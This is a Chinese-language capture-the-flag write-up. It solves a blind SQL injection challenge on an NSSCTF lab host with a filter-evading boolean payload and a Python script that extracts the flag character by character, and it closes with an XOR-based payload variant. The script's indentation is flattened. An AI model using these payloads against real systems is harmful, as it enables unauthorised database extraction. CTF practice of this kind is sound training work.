爆破题
首先说一下payload
(ascii(substr((select(flag)from(flag)),{},1))={})这题是整形注入,不需要进行闭合,另外这题没有报错回显,又过滤了联合注入,所以我们来使用bool忙著的方法
但是这题过滤了内联注释,过滤空格,那就只好用括号绕过罢了,所以最终构造了上面的payload
利用脚本如下
import requests, re
dic = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890{-_}"
url = "http://node2.anna.nssctf.cn:28998"
res = ""
payload = "(ascii(substr((select(flag)from(flag)),{},1))={})"
for a in range(1,50):
temp = res.__len__()
for i in dic:
data = {
"id": payload.format(a, ord(i))
}
r = requests.post(url=url, data=data)
print(r.text)
if re.findall("Hello", r.text):
print(r.url,"\n",r.text)
res += i
break
if temp == res.__len__():
break
print(res)
跑一两分钟就出来了
另外我看评论区有人说异或注入,其实没啥必要,异或盲注的payload
0^(ascii(substr((select(flag)from(flag)),{},1))={})利用脚本和前面一样